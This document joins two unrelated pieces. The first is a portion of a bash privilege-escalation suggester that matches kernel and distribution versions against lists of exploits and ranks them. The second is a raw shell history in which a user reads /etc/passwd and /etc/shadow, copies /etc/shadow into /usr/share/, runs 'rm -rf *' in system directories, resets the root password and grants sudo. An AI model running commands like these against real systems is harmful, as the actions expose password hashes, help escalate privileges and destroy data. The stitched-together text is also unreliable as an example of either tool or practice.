&& echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}" echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")" echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")" if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"; elif [ -n "$PKGLIST_FILE" ]; then pkgListFile="${txtred}unrecognized file 
provided${txtrst}"; elif [ -n "$PKG_LIST" ]; then pkgListFile="${txtgrn}from current OS${txtrst}"; fi echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")" # handle --kernelspacy-only & --userspace-only filter options if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then unset EXPLOITS_USERSPACE; declare -A EXPLOITS_USERSPACE; fi if [ "$opt_userspace_only" = "true" ]; then unset EXPLOITS; declare -A EXPLOITS; fi echo echo -e "${bldwht}Searching among:${txtrst}" echo echo "${#EXPLOITS[@]} kernel space exploits" echo "${#EXPLOITS_USERSPACE[@]} user space exploits" echo echo -e "${bldwht}Possible Exploits:${txtrst}" echo # start analysis j=0 for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do i=0 while read -r line; do arr[i]="$line"; i=$((i + 1)) done <<< "$EXP"; NAME="${arr[0]}" && NAME="${NAME:6}"; REQS="${arr[1]}" && REQS="${REQS:6}"; TAGS="${arr[2]}" && TAGS="${TAGS:6}"; RANK="${arr[3]}" && RANK="${RANK:6}"; IFS=',' read -r -a array <<< "$REQS"; REQS_NUM=${#array[@]}; PASSED_REQ=0; for REQ in "${array[@]}"; do if (checkRequirement "$REQ" "${array[0]}"); then PASSED_REQ=$(($PASSED_REQ + 1)); else break; fi; done; if [ $PASSED_REQ -eq $REQS_NUM ]; then if [ "$opt_cvelist_file" = "true" ]; then cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|") [ ! 
$(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue; fi; tags=""; if [ -n "$TAGS" -a -n "$OS" ]; then IFS=',' read -r -a tags_array <<< "$TAGS"; TAGS_NUM=${#tags_array[@]}; [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1)); for TAG in "${tags_array[@]}"; do tag_distro=$(echo "$TAG" | cut -d'=' -f1); tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2) tag_distro_num="${tag_distro_num_all%{*}"; if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2)); tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1); tag_pkg_num=""; [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2); if [ -z "$tag_pkg_num" ]; then [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"; elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then TAG="${yellow}[ ${TAG} ]${txtrst}"; RANK=$(($RANK + 3)); else [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"; fi; elif [ -n "$tag_pkg_num" -a -n "$tag_pkg" ]; then TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"; fi; fi; tags="${tags}${TAG},"; done [ -n "$tags" ] && tags="${tags%?}"; else tags="$TAGS"; fi; EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d'); exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"; ((j++)); fi; done clear vi prueba.sh ls chmod 777 prueba.sh sh prueba.sh ls echo "Noobs{0..99999}" > noobs{0..99999} ls cat prueba.sh ./prueba ls. 
./prueba.sh echo "Noobs{0..99999}" >> noobs{0..99999} echo "Noobs{0..99999}" >> noobs ls cat noobs echo "Noobs" >> noobs{0..712} echo "Noobs" >> noobs0 echo "Noobs" >> noobs1 echo "Noobs" >> noobs2 echo "Noobs" >> noobs3 echo "Noobs" >> noobs4 echo "Noobs" >> noobs5 echo "Noobs" >> noobs6 rm * rm -rf * ls cat test.sh exit ls ls -la cat .bash_history ls ls -l ls -la nano .bomba.c.swp cat .bomba.c.swp uname -a cat /etc/*release* cat /etc/passwd uname -a ls /bin pwd which pwd ls /usr/bin ls /usr/bin/ ls /usr/bin/* file /usr/bin/* file /usr/bin/pwd cat /etc/shells ls pwd ls -la cat .xds.hj.swp exit ls caf les.sh cat les.sh wc -l les.sh ls cd test ls vi vim vi xds.hj vi test.sh ls chmod 777 test.sh ./test.sh ls ls -la sh test sh test.sh 18 more /var/mail ls /var/mail ls /var/mail/usuario ls /var/mail/usuario/ ls /var/mail/usuario ls -la /var/mail/usuario more /var/mail/usuario cd /etc/rc.d/init.d ls cd functions LS more functions clear ls cd /home ls cd usuario/ ls sh test sh test.sh su adm cat /etc/os-release clear su passwd root sudo passwd root reboot sudo reboot clear whoami su - usermod -aG sudo usuario grep '^sudo' /etc/group screenfetch neofetch tip top htop clear ls cd cd.. cd / cd /etc/ ls cd cd /usr/ ls cd /usr/share/ ls rm -rf */ ls rm -rf * clear ls rm -rf zsh ls clear ls cd zsh ls cd site-functioms cd site-functions ls cat _loginctl zsh cd . cd .. ls cd.. cd .. ls cd .. ls cd .. clear cat /etc/passwd cat /etc/shadow cat /etc/shadow/ cat /etc/ cat /etc/ls cat /etc/ & ls cat /etc/passwd sudo su su clear tail /etc/passwd tail /etc/shadow cp /etc/shadow /usr/share/ clear exit ls uname -a ls cd / ls ls -la cd ls pwd cd .. ls ls /var ls / df fdisk cat /proc/cpuinfo ls cd .. 
ls ifconfig ip sudo su exit ps ax w history cp /etc/shadow /usr/share/ ls /usr/bin/* w vi .bash_history ls ll cd ls ps ax cd /tmp ls cat 2 ll vi 2 cat 2 ls ps ax h sudo sudo su ps ax ls top find / find /bin find / -name find -name / ls w top lscpu ps ax ls cd lost+found/ ll exit ls -l pwd cd / ls -l uname -a exit